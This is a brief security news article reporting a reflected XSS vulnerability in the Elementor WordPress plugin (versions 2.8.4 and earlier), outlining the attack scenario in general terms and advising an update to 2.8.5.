Vulnerability in Elementor, page builder plugin, affects more than 4 million WordPress sites

When a new security flaw is reported in a software development, it starts a race between vulnerability testing experts in charge of correcting it and cybercriminals who want to exploit the flaws. This is especially notable as for the most commonly used products, such as some WordPress plugins.

Elementor, one of the world’s most popular plugins, presents a vulnerability dubbed XSS Authenticated Reflection, whose exploitation would allow threat actors to run scripts on WordPress sites from another site to deploy malicious activities such as theft of access credentials.

Vulnerability testing experts mention that the
flaw depends on the loading of a script in the vulnerable site using, for
example, a search box. A possible exploitation scenario is described below:

  • A
    threat actor creates a specially designed URL for the attack
  • When
    the victim follows the URL, the script, which is hosted on an external site,
    will be run
  • The
    hacker will send a link to target users to steal their credentials from the
    attacked website

This flaw has already been reported on
WordPress Vulnerability Database, a platform that contains updated information
about any vulnerability found in the content management system and its most
popular plugins. The administrators reported that, in order to avoid exploitation
in the wild, the proof of concept will remain unpublished until at least
February 12.

The vulnerability was found by security firm, which reported it to Elementor
editors as soon as possible. WordPress visual builder developers immediately
fixed the flaw. The vulnerability was publicly disclosed once its remediation
was completed.

Specialists in vulnerability testing from the
International Institute of Cyber Security (IICS) mention that the flaw affects
Elementor versions 2.8.4 and earlier. The new version, 2.8.5, must be updated
from the admin interface of WordPress sites. After logging in, you will find an
update link on your WordPress page; otherwise, you can update the plugin from
the website administrator sidebar.

You Might Also Like